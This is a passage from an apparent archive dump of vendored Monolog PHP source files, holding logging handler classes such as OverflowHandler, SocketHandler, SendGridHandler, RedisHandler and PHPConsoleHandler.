* * Usage example: * * ``` * $log = new Logger('application'); * $handler = new SomeHandler(...) * * // Pass all warnings to the handler when more than 10 & all error messages when more then 5 * $overflow = new OverflowHandler($handler, [Logger::WARNING => 10, Logger::ERROR => 5]); * * $log->pushHandler($overflow); *``` * * @author Kris Buist */ class OverflowHandler extends AbstractHandler implements FormattableHandlerInterface { /** @var HandlerInterface */ private $handler; /** @var int[] */ private $thresholdMap = [ Logger::DEBUG => 0, Logger::INFO => 0, Logger::NOTICE => 0, Logger::WARNING => 0, Logger::ERROR => 0, Logger::CRITICAL => 0, Logger::ALERT => 0, Logger::EMERGENCY => 0, ]; /** * Buffer of all messages passed to the handler before the threshold was reached * * @var mixed[][] */ private $buffer = []; /** * @param HandlerInterface $handler * @param int[] $thresholdMap Dictionary of logger level => threshold */ public function __construct( HandlerInterface $handler, array $thresholdMap = [], $level = Logger::DEBUG, bool $bubble = true ) { $this->handler = $handler; foreach ($thresholdMap as $thresholdLevel => $threshold) { $this->thresholdMap[$thresholdLevel] = $threshold; } parent::__construct($level, $bubble); } /** * Handles a record. * * All records may be passed to this method, and the handler should discard * those that it does not want to handle. * * The return value of this function controls the bubbling process of the handler stack. * Unless the bubbling is interrupted (by returning true), the Logger class will keep on * calling further handlers in the stack with a given log record. * * {@inheritDoc} */ public function handle(array $record): bool { if ($record['level'] < $this->level) { return false; } $level = $record['level']; if (!isset($this->thresholdMap[$level])) { $this->thresholdMap[$level] = 0; } if ($this->thresholdMap[$level] > 0) { // The overflow threshold is not yet reached, so we're buffering the record and lowering the threshold by 1 $this->thresholdMap[$level]--; $this->buffer[$level][] = $record; return false === $this->bubble; } if ($this->thresholdMap[$level] == 0) { // This current message is breaking the threshold. Flush the buffer and continue handling the current record foreach ($this->buffer[$level] ?? [] as $buffered) { $this->handler->handle($buffered); } $this->thresholdMap[$level]--; unset($this->buffer[$level]); } $this->handler->handle($record); return false === $this->bubble; } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { if ($this->handler instanceof FormattableHandlerInterface) { $this->handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type '.get_class($this->handler).' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { if ($this->handler instanceof FormattableHandlerInterface) { return $this->handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type '.get_class($this->handler).' does not support formatters.'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/LogEntriesHandler.php000064400000003605147600400120023046 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; /** * @author Robert Kaufmann III */ class LogEntriesHandler extends SocketHandler { /** * @var string */ protected $logToken; /** * @param string $token Log token supplied by LogEntries * @param bool $useSSL Whether or not SSL encryption should be used. * @param string $host Custom hostname to send the data to if needed * * @throws MissingExtensionException If SSL encryption is set to true and OpenSSL is missing */ public function __construct( string $token, bool $useSSL = true, $level = Logger::DEBUG, bool $bubble = true, string $host = 'data.logentries.com', bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { if ($useSSL && !extension_loaded('openssl')) { throw new MissingExtensionException('The OpenSSL PHP plugin is required to use SSL encrypted connection for LogEntriesHandler'); } $endpoint = $useSSL ? 'ssl://' . $host . ':443' : $host . ':80'; parent::__construct( $endpoint, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); $this->logToken = $token; } /** * {@inheritDoc} */ protected function generateDataStream(array $record): string { return $this->logToken . ' ' . $record['formatted']; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/InsightOpsHandler.php000064400000004072147600400120023061 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; /** * Inspired on LogEntriesHandler. * * @author Robert Kaufmann III * @author Gabriel Machado */ class InsightOpsHandler extends SocketHandler { /** * @var string */ protected $logToken; /** * @param string $token Log token supplied by InsightOps * @param string $region Region where InsightOps account is hosted. Could be 'us' or 'eu'. * @param bool $useSSL Whether or not SSL encryption should be used * * @throws MissingExtensionException If SSL encryption is set to true and OpenSSL is missing */ public function __construct( string $token, string $region = 'us', bool $useSSL = true, $level = Logger::DEBUG, bool $bubble = true, bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { if ($useSSL && !extension_loaded('openssl')) { throw new MissingExtensionException('The OpenSSL PHP plugin is required to use SSL encrypted connection for InsightOpsHandler'); } $endpoint = $useSSL ? 'ssl://' . $region . '.data.logs.insight.rapid7.com:443' : $region . '.data.logs.insight.rapid7.com:80'; parent::__construct( $endpoint, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); $this->logToken = $token; } /** * {@inheritDoc} */ protected function generateDataStream(array $record): string { return $this->logToken . ' ' . $record['formatted']; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/GroupHandler.php000064400000006242147600400120022067 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\ResettableInterface; /** * Forwards records to multiple handlers * * @author Lenar Lõhmus * * @phpstan-import-type Record from \Monolog\Logger */ class GroupHandler extends Handler implements ProcessableHandlerInterface, ResettableInterface { use ProcessableHandlerTrait; /** @var HandlerInterface[] */ protected $handlers; /** @var bool */ protected $bubble; /** * @param HandlerInterface[] $handlers Array of Handlers. * @param bool $bubble Whether the messages that are handled can bubble up the stack or not */ public function __construct(array $handlers, bool $bubble = true) { foreach ($handlers as $handler) { if (!$handler instanceof HandlerInterface) { throw new \InvalidArgumentException('The first argument of the GroupHandler must be an array of HandlerInterface instances.'); } } $this->handlers = $handlers; $this->bubble = $bubble; } /** * {@inheritDoc} */ public function isHandling(array $record): bool { foreach ($this->handlers as $handler) { if ($handler->isHandling($record)) { return true; } } return false; } /** * {@inheritDoc} */ public function handle(array $record): bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } foreach ($this->handlers as $handler) { $handler->handle($record); } return false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records): void { if ($this->processors) { $processed = []; foreach ($records as $record) { $processed[] = $this->processRecord($record); } /** @var Record[] $records */ $records = $processed; } foreach ($this->handlers as $handler) { $handler->handleBatch($records); } } public function reset() { $this->resetProcessors(); foreach ($this->handlers as $handler) { if ($handler instanceof ResettableInterface) { $handler->reset(); } } } public function close(): void { parent::close(); foreach ($this->handlers as $handler) { $handler->close(); } } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { foreach ($this->handlers as $handler) { if ($handler instanceof FormattableHandlerInterface) { $handler->setFormatter($formatter); } } return $this; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SendGridHandler.php000064400000005467147600400120022502 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; /** * SendGridrHandler uses the SendGrid API v2 function to send Log emails, more information in https://sendgrid.com/docs/API_Reference/Web_API/mail.html * * @author Ricardo Fontanelli */ class SendGridHandler extends MailHandler { /** * The SendGrid API User * @var string */ protected $apiUser; /** * The SendGrid API Key * @var string */ protected $apiKey; /** * The email addresses to which the message will be sent * @var string */ protected $from; /** * The email addresses to which the message will be sent * @var string[] */ protected $to; /** * The subject of the email * @var string */ protected $subject; /** * @param string $apiUser The SendGrid API User * @param string $apiKey The SendGrid API Key * @param string $from The sender of the email * @param string|string[] $to The recipients of the email * @param string $subject The subject of the mail */ public function __construct(string $apiUser, string $apiKey, string $from, $to, string $subject, $level = Logger::ERROR, bool $bubble = true) { if (!extension_loaded('curl')) { throw new MissingExtensionException('The curl extension is needed to use the SendGridHandler'); } parent::__construct($level, $bubble); $this->apiUser = $apiUser; $this->apiKey = $apiKey; $this->from = $from; $this->to = (array) $to; $this->subject = $subject; } /** * {@inheritDoc} */ protected function send(string $content, array $records): void { $message = []; $message['api_user'] = $this->apiUser; $message['api_key'] = $this->apiKey; $message['from'] = $this->from; foreach ($this->to as $recipient) { $message['to[]'] = $recipient; } $message['subject'] = $this->subject; $message['date'] = date('r'); if ($this->isHtmlBody($content)) { $message['html'] = $content; } else { $message['text'] = $content; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://api.sendgrid.com/api/mail.send.json'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($message)); Curl\Util::execute($ch, 2); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/RedisHandler.php000064400000005714147600400120022044 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\LineFormatter; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; /** * Logs to a Redis key using rpush * * usage example: * * $log = new Logger('application'); * $redis = new RedisHandler(new Predis\Client("tcp://localhost:6379"), "logs", "prod"); * $log->pushHandler($redis); * * @author Thomas Tourlourat * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class RedisHandler extends AbstractProcessingHandler { /** @var \Predis\Client<\Predis\Client>|\Redis */ private $redisClient; /** @var string */ private $redisKey; /** @var int */ protected $capSize; /** * @param \Predis\Client<\Predis\Client>|\Redis $redis The redis instance * @param string $key The key name to push records to * @param int $capSize Number of entries to limit list size to, 0 = unlimited */ public function __construct($redis, string $key, $level = Logger::DEBUG, bool $bubble = true, int $capSize = 0) { if (!(($redis instanceof \Predis\Client) || ($redis instanceof \Redis))) { throw new \InvalidArgumentException('Predis\Client or Redis instance required'); } $this->redisClient = $redis; $this->redisKey = $key; $this->capSize = $capSize; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { if ($this->capSize) { $this->writeCapped($record); } else { $this->redisClient->rpush($this->redisKey, $record["formatted"]); } } /** * Write and cap the collection * Writes the record to the redis list and caps its * * @phpstan-param FormattedRecord $record */ protected function writeCapped(array $record): void { if ($this->redisClient instanceof \Redis) { $mode = defined('\Redis::MULTI') ? \Redis::MULTI : 1; $this->redisClient->multi($mode) ->rpush($this->redisKey, $record["formatted"]) ->ltrim($this->redisKey, -$this->capSize, -1) ->exec(); } else { $redisKey = $this->redisKey; $capSize = $this->capSize; $this->redisClient->transaction(function ($tx) use ($record, $redisKey, $capSize) { $tx->rpush($redisKey, $record["formatted"]); $tx->ltrim($redisKey, -$capSize, -1); }); } } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SocketHandler.php000064400000027773147600400120022237 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; /** * Stores to any socket - uses fsockopen() or pfsockopen(). * * @author Pablo de Leon Belloc * @see http://php.net/manual/en/function.fsockopen.php * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class SocketHandler extends AbstractProcessingHandler { /** @var string */ private $connectionString; /** @var float */ private $connectionTimeout; /** @var resource|null */ private $resource; /** @var float */ private $timeout; /** @var float */ private $writingTimeout; /** @var ?int */ private $lastSentBytes = null; /** @var ?int */ private $chunkSize; /** @var bool */ private $persistent; /** @var ?int */ private $errno = null; /** @var ?string */ private $errstr = null; /** @var ?float */ private $lastWritingAt = null; /** * @param string $connectionString Socket connection string * @param bool $persistent Flag to enable/disable persistent connections * @param float $timeout Socket timeout to wait until the request is being aborted * @param float $writingTimeout Socket timeout to wait until the request should've been sent/written * @param float|null $connectionTimeout Socket connect timeout to wait until the connection should've been * established * @param int|null $chunkSize Sets the chunk size. Only has effect during connection in the writing cycle * * @throws \InvalidArgumentException If an invalid timeout value (less than 0) is passed. */ public function __construct( string $connectionString, $level = Logger::DEBUG, bool $bubble = true, bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { parent::__construct($level, $bubble); $this->connectionString = $connectionString; if ($connectionTimeout !== null) { $this->validateTimeout($connectionTimeout); } $this->connectionTimeout = $connectionTimeout ?? (float) ini_get('default_socket_timeout'); $this->persistent = $persistent; $this->validateTimeout($timeout); $this->timeout = $timeout; $this->validateTimeout($writingTimeout); $this->writingTimeout = $writingTimeout; $this->chunkSize = $chunkSize; } /** * Connect (if necessary) and write to the socket * * {@inheritDoc} * * @throws \UnexpectedValueException * @throws \RuntimeException */ protected function write(array $record): void { $this->connectIfNotConnected(); $data = $this->generateDataStream($record); $this->writeToSocket($data); } /** * We will not close a PersistentSocket instance so it can be reused in other requests. */ public function close(): void { if (!$this->isPersistent()) { $this->closeSocket(); } } /** * Close socket, if open */ public function closeSocket(): void { if (is_resource($this->resource)) { fclose($this->resource); $this->resource = null; } } /** * Set socket connection to be persistent. It only has effect before the connection is initiated. */ public function setPersistent(bool $persistent): self { $this->persistent = $persistent; return $this; } /** * Set connection timeout. Only has effect before we connect. * * @see http://php.net/manual/en/function.fsockopen.php */ public function setConnectionTimeout(float $seconds): self { $this->validateTimeout($seconds); $this->connectionTimeout = $seconds; return $this; } /** * Set write timeout. Only has effect before we connect. * * @see http://php.net/manual/en/function.stream-set-timeout.php */ public function setTimeout(float $seconds): self { $this->validateTimeout($seconds); $this->timeout = $seconds; return $this; } /** * Set writing timeout. Only has effect during connection in the writing cycle. * * @param float $seconds 0 for no timeout */ public function setWritingTimeout(float $seconds): self { $this->validateTimeout($seconds); $this->writingTimeout = $seconds; return $this; } /** * Set chunk size. Only has effect during connection in the writing cycle. */ public function setChunkSize(int $bytes): self { $this->chunkSize = $bytes; return $this; } /** * Get current connection string */ public function getConnectionString(): string { return $this->connectionString; } /** * Get persistent setting */ public function isPersistent(): bool { return $this->persistent; } /** * Get current connection timeout setting */ public function getConnectionTimeout(): float { return $this->connectionTimeout; } /** * Get current in-transfer timeout */ public function getTimeout(): float { return $this->timeout; } /** * Get current local writing timeout * * @return float */ public function getWritingTimeout(): float { return $this->writingTimeout; } /** * Get current chunk size */ public function getChunkSize(): ?int { return $this->chunkSize; } /** * Check to see if the socket is currently available. * * UDP might appear to be connected but might fail when writing. See http://php.net/fsockopen for details. */ public function isConnected(): bool { return is_resource($this->resource) && !feof($this->resource); // on TCP - other party can close connection. } /** * Wrapper to allow mocking * * @return resource|false */ protected function pfsockopen() { return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->connectionTimeout); } /** * Wrapper to allow mocking * * @return resource|false */ protected function fsockopen() { return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->connectionTimeout); } /** * Wrapper to allow mocking * * @see http://php.net/manual/en/function.stream-set-timeout.php * * @return bool */ protected function streamSetTimeout() { $seconds = floor($this->timeout); $microseconds = round(($this->timeout - $seconds) * 1e6); if (!is_resource($this->resource)) { throw new \LogicException('streamSetTimeout called but $this->resource is not a resource'); } return stream_set_timeout($this->resource, (int) $seconds, (int) $microseconds); } /** * Wrapper to allow mocking * * @see http://php.net/manual/en/function.stream-set-chunk-size.php * * @return int|bool */ protected function streamSetChunkSize() { if (!is_resource($this->resource)) { throw new \LogicException('streamSetChunkSize called but $this->resource is not a resource'); } if (null === $this->chunkSize) { throw new \LogicException('streamSetChunkSize called but $this->chunkSize is not set'); } return stream_set_chunk_size($this->resource, $this->chunkSize); } /** * Wrapper to allow mocking * * @return int|bool */ protected function fwrite(string $data) { if (!is_resource($this->resource)) { throw new \LogicException('fwrite called but $this->resource is not a resource'); } return @fwrite($this->resource, $data); } /** * Wrapper to allow mocking * * @return mixed[]|bool */ protected function streamGetMetadata() { if (!is_resource($this->resource)) { throw new \LogicException('streamGetMetadata called but $this->resource is not a resource'); } return stream_get_meta_data($this->resource); } private function validateTimeout(float $value): void { if ($value < 0) { throw new \InvalidArgumentException("Timeout must be 0 or a positive float (got $value)"); } } private function connectIfNotConnected(): void { if ($this->isConnected()) { return; } $this->connect(); } /** * @phpstan-param FormattedRecord $record */ protected function generateDataStream(array $record): string { return (string) $record['formatted']; } /** * @return resource|null */ protected function getResource() { return $this->resource; } private function connect(): void { $this->createSocketResource(); $this->setSocketTimeout(); $this->setStreamChunkSize(); } private function createSocketResource(): void { if ($this->isPersistent()) { $resource = $this->pfsockopen(); } else { $resource = $this->fsockopen(); } if (is_bool($resource)) { throw new \UnexpectedValueException("Failed connecting to $this->connectionString ($this->errno: $this->errstr)"); } $this->resource = $resource; } private function setSocketTimeout(): void { if (!$this->streamSetTimeout()) { throw new \UnexpectedValueException("Failed setting timeout with stream_set_timeout()"); } } private function setStreamChunkSize(): void { if ($this->chunkSize && !$this->streamSetChunkSize()) { throw new \UnexpectedValueException("Failed setting chunk size with stream_set_chunk_size()"); } } private function writeToSocket(string $data): void { $length = strlen($data); $sent = 0; $this->lastSentBytes = $sent; while ($this->isConnected() && $sent < $length) { if (0 == $sent) { $chunk = $this->fwrite($data); } else { $chunk = $this->fwrite(substr($data, $sent)); } if ($chunk === false) { throw new \RuntimeException("Could not write to socket"); } $sent += $chunk; $socketInfo = $this->streamGetMetadata(); if (is_array($socketInfo) && $socketInfo['timed_out']) { throw new \RuntimeException("Write timed-out"); } if ($this->writingIsTimedOut($sent)) { throw new \RuntimeException("Write timed-out, no data sent for `{$this->writingTimeout}` seconds, probably we got disconnected (sent $sent of $length)"); } } if (!$this->isConnected() && $sent < $length) { throw new \RuntimeException("End-of-file reached, probably we got disconnected (sent $sent of $length)"); } } private function writingIsTimedOut(int $sent): bool { // convert to ms if (0.0 == $this->writingTimeout) { return false; } if ($sent !== $this->lastSentBytes) { $this->lastWritingAt = microtime(true); $this->lastSentBytes = $sent; return false; } else { usleep(100); } if ((microtime(true) - $this->lastWritingAt) >= $this->writingTimeout) { $this->closeSocket(); return true; } return false; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/PHPConsoleHandler.php000064400000024454147600400120022752 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\LineFormatter; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; use Monolog\Utils; use PhpConsole\Connector; use PhpConsole\Handler as VendorPhpConsoleHandler; use PhpConsole\Helper; /** * Monolog handler for Google Chrome extension "PHP Console" * * Display PHP error/debug log messages in Google Chrome console and notification popups, executes PHP code remotely * * Usage: * 1. Install Google Chrome extension [now dead and removed from the chrome store] * 2. See overview https://github.com/barbushin/php-console#overview * 3. Install PHP Console library https://github.com/barbushin/php-console#installation * 4. Example (result will looks like http://i.hizliresim.com/vg3Pz4.png) * * $logger = new \Monolog\Logger('all', array(new \Monolog\Handler\PHPConsoleHandler())); * \Monolog\ErrorHandler::register($logger); * echo $undefinedVar; * $logger->debug('SELECT * FROM users', array('db', 'time' => 0.012)); * PC::debug($_SERVER); // PHP Console debugger for any type of vars * * @author Sergey Barbushin https://www.linkedin.com/in/barbushin * * @phpstan-import-type Record from \Monolog\Logger * @deprecated Since 2.8.0 and 3.2.0, PHPConsole is abandoned and thus we will drop this handler in Monolog 4 */ class PHPConsoleHandler extends AbstractProcessingHandler { /** @var array */ private $options = [ 'enabled' => true, // bool Is PHP Console server enabled 'classesPartialsTraceIgnore' => ['Monolog\\'], // array Hide calls of classes started with... 'debugTagsKeysInContext' => [0, 'tag'], // bool Is PHP Console server enabled 'useOwnErrorsHandler' => false, // bool Enable errors handling 'useOwnExceptionsHandler' => false, // bool Enable exceptions handling 'sourcesBasePath' => null, // string Base path of all project sources to strip in errors source paths 'registerHelper' => true, // bool Register PhpConsole\Helper that allows short debug calls like PC::debug($var, 'ta.g.s') 'serverEncoding' => null, // string|null Server internal encoding 'headersLimit' => null, // int|null Set headers size limit for your web-server 'password' => null, // string|null Protect PHP Console connection by password 'enableSslOnlyMode' => false, // bool Force connection by SSL for clients with PHP Console installed 'ipMasks' => [], // array Set IP masks of clients that will be allowed to connect to PHP Console: array('192.168.*.*', '') 'enableEvalListener' => false, // bool Enable eval request to be handled by eval dispatcher(if enabled, 'password' option is also required) 'dumperDetectCallbacks' => false, // bool Convert callback items in dumper vars to (callback SomeClass::someMethod) strings 'dumperLevelLimit' => 5, // int Maximum dumped vars array or object nested dump level 'dumperItemsCountLimit' => 100, // int Maximum dumped var same level array items or object properties number 'dumperItemSizeLimit' => 5000, // int Maximum length of any string or dumped array item 'dumperDumpSizeLimit' => 500000, // int Maximum approximate size of dumped vars result formatted in JSON 'detectDumpTraceAndSource' => false, // bool Autodetect and append trace data to debug 'dataStorage' => null, // \PhpConsole\Storage|null Fixes problem with custom $_SESSION handler(see http://goo.gl/Ne8juJ) ]; /** @var Connector */ private $connector; /** * @param array $options See \Monolog\Handler\PHPConsoleHandler::$options for more details * @param Connector|null $connector Instance of \PhpConsole\Connector class (optional) * @throws \RuntimeException */ public function __construct(array $options = [], ?Connector $connector = null, $level = Logger::DEBUG, bool $bubble = true) { if (!class_exists('PhpConsole\Connector')) { throw new \RuntimeException('PHP Console library not found. See https://github.com/barbushin/php-console#installation'); } parent::__construct($level, $bubble); $this->options = $this->initOptions($options); $this->connector = $this->initConnector($connector); } /** * @param array $options * * @return array */ private function initOptions(array $options): array { $wrongOptions = array_diff(array_keys($options), array_keys($this->options)); if ($wrongOptions) { throw new \RuntimeException('Unknown options: ' . implode(', ', $wrongOptions)); } return array_replace($this->options, $options); } private function initConnector(?Connector $connector = null): Connector { if (!$connector) { if ($this->options['dataStorage']) { Connector::setPostponeStorage($this->options['dataStorage']); } $connector = Connector::getInstance(); } if ($this->options['registerHelper'] && !Helper::isRegistered()) { Helper::register(); } if ($this->options['enabled'] && $connector->isActiveClient()) { if ($this->options['useOwnErrorsHandler'] || $this->options['useOwnExceptionsHandler']) { $handler = VendorPhpConsoleHandler::getInstance(); $handler->setHandleErrors($this->options['useOwnErrorsHandler']); $handler->setHandleExceptions($this->options['useOwnExceptionsHandler']); $handler->start(); } if ($this->options['sourcesBasePath']) { $connector->setSourcesBasePath($this->options['sourcesBasePath']); } if ($this->options['serverEncoding']) { $connector->setServerEncoding($this->options['serverEncoding']); } if ($this->options['password']) { $connector->setPassword($this->options['password']); } if ($this->options['enableSslOnlyMode']) { $connector->enableSslOnlyMode(); } if ($this->options['ipMasks']) { $connector->setAllowedIpMasks($this->options['ipMasks']); } if ($this->options['headersLimit']) { $connector->setHeadersLimit($this->options['headersLimit']); } if ($this->options['detectDumpTraceAndSource']) { $connector->getDebugDispatcher()->detectTraceAndSource = true; } $dumper = $connector->getDumper(); $dumper->levelLimit = $this->options['dumperLevelLimit']; $dumper->itemsCountLimit = $this->options['dumperItemsCountLimit']; $dumper->itemSizeLimit = $this->options['dumperItemSizeLimit']; $dumper->dumpSizeLimit = $this->options['dumperDumpSizeLimit']; $dumper->detectCallbacks = $this->options['dumperDetectCallbacks']; if ($this->options['enableEvalListener']) { $connector->startEvalRequestsListener(); } } return $connector; } public function getConnector(): Connector { return $this->connector; } /** * @return array */ public function getOptions(): array { return $this->options; } public function handle(array $record): bool { if ($this->options['enabled'] && $this->connector->isActiveClient()) { return parent::handle($record); } return !$this->bubble; } /** * Writes the record down to the log of the implementing handler */ protected function write(array $record): void { if ($record['level'] < Logger::NOTICE) { $this->handleDebugRecord($record); } elseif (isset($record['context']['exception']) && $record['context']['exception'] instanceof \Throwable) { $this->handleExceptionRecord($record); } else { $this->handleErrorRecord($record); } } /** * @phpstan-param Record $record */ private function handleDebugRecord(array $record): void { $tags = $this->getRecordTags($record); $message = $record['message']; if ($record['context']) { $message .= ' ' . Utils::jsonEncode($this->connector->getDumper()->dump(array_filter($record['context'])), null, true); } $this->connector->getDebugDispatcher()->dispatchDebug($message, $tags, $this->options['classesPartialsTraceIgnore']); } /** * @phpstan-param Record $record */ private function handleExceptionRecord(array $record): void { $this->connector->getErrorsDispatcher()->dispatchException($record['context']['exception']); } /** * @phpstan-param Record $record */ private function handleErrorRecord(array $record): void { $context = $record['context']; $this->connector->getErrorsDispatcher()->dispatchError( $context['code'] ?? null, $context['message'] ?? $record['message'], $context['file'] ?? null, $context['line'] ?? null, $this->options['classesPartialsTraceIgnore'] ); } /** * @phpstan-param Record $record * @return string */ private function getRecordTags(array &$record) { $tags = null; if (!empty($record['context'])) { $context = & $record['context']; foreach ($this->options['debugTagsKeysInContext'] as $key) { if (!empty($context[$key])) { $tags = $context[$key]; if ($key === 0) { array_shift($context); } else { unset($context[$key]); } break; } } } return $tags ?: strtolower($record['level_name']); } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter('%message%'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SamplingHandler.php000064400000010362147600400120022543 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; /** * Sampling handler * * A sampled event stream can be useful for logging high frequency events in * a production environment where you only need an idea of what is happening * and are not concerned with capturing every occurrence. Since the decision to * handle or not handle a particular event is determined randomly, the * resulting sampled log is not guaranteed to contain 1/N of the events that * occurred in the application, but based on the Law of large numbers, it will * tend to be close to this ratio with a large number of attempts. * * @author Bryan Davis * @author Kunal Mehta * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ class SamplingHandler extends AbstractHandler implements ProcessableHandlerInterface, FormattableHandlerInterface { use ProcessableHandlerTrait; /** * @var HandlerInterface|callable * @phpstan-var HandlerInterface|callable(Record|array{level: Level}|null, HandlerInterface): HandlerInterface */ protected $handler; /** * @var int $factor */ protected $factor; /** * @psalm-param HandlerInterface|callable(Record|array{level: Level}|null, HandlerInterface): HandlerInterface $handler * * @param callable|HandlerInterface $handler Handler or factory callable($record|null, $samplingHandler). * @param int $factor Sample factor (e.g. 10 means every ~10th record is sampled) */ public function __construct($handler, int $factor) { parent::__construct(); $this->handler = $handler; $this->factor = $factor; if (!$this->handler instanceof HandlerInterface && !is_callable($this->handler)) { throw new \RuntimeException("The given handler (".json_encode($this->handler).") is not a callable nor a Monolog\Handler\HandlerInterface object"); } } public function isHandling(array $record): bool { return $this->getHandler($record)->isHandling($record); } public function handle(array $record): bool { if ($this->isHandling($record) && mt_rand(1, $this->factor) === 1) { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $this->getHandler($record)->handle($record); } return false === $this->bubble; } /** * Return the nested handler * * If the handler was provided as a factory callable, this will trigger the handler's instantiation. * * @phpstan-param Record|array{level: Level}|null $record * * @return HandlerInterface */ public function getHandler(array $record = null) { if (!$this->handler instanceof HandlerInterface) { $this->handler = ($this->handler)($record, $this); if (!$this->handler instanceof HandlerInterface) { throw new \RuntimeException("The factory callable should return a HandlerInterface"); } } return $this->handler; } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { $handler = $this->getHandler(); if ($handler instanceof FormattableHandlerInterface) { $handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type '.get_class($handler).' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { $handler = $this->getHandler(); if ($handler instanceof FormattableHandlerInterface) { return $handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type '.get_class($handler).' does not support formatters.'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/DoctrineCouchDBHandler.php000064400000002150147600400120023724 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\NormalizerFormatter; use Monolog\Formatter\FormatterInterface; use Doctrine\CouchDB\CouchDBClient; /** * CouchDB handler for Doctrine CouchDB ODM * * @author Markus Bachmann */ class DoctrineCouchDBHandler extends AbstractProcessingHandler { /** @var CouchDBClient */ private $client; public function __construct(CouchDBClient $client, $level = Logger::DEBUG, bool $bubble = true) { $this->client = $client; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { $this->client->postDocument($record['formatted']); } protected function getDefaultFormatter(): FormatterInterface { return new NormalizerFormatter; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FallbackGroupHandler.php000064400000003341147600400120023504 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Throwable; /** * Forwards records to at most one handler * * If a handler fails, the exception is suppressed and the record is forwarded to the next handler. * * As soon as one handler handles a record successfully, the handling stops there. * * @phpstan-import-type Record from \Monolog\Logger */ class FallbackGroupHandler extends GroupHandler { /** * {@inheritDoc} */ public function handle(array $record): bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } foreach ($this->handlers as $handler) { try { $handler->handle($record); break; } catch (Throwable $e) { // What throwable? } } return false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records): void { if ($this->processors) { $processed = []; foreach ($records as $record) { $processed[] = $this->processRecord($record); } /** @var Record[] $records */ $records = $processed; } foreach ($this->handlers as $handler) { try { $handler->handleBatch($records); break; } catch (Throwable $e) { // What throwable? } } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/CouchDBHandler.php000064400000004067147600400120022245 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\JsonFormatter; use Monolog\Logger; /** * CouchDB handler * * @author Markus Bachmann */ class CouchDBHandler extends AbstractProcessingHandler { /** @var mixed[] */ private $options; /** * @param mixed[] $options */ public function __construct(array $options = [], $level = Logger::DEBUG, bool $bubble = true) { $this->options = array_merge([ 'host' => 'localhost', 'port' => 5984, 'dbname' => 'logger', 'username' => 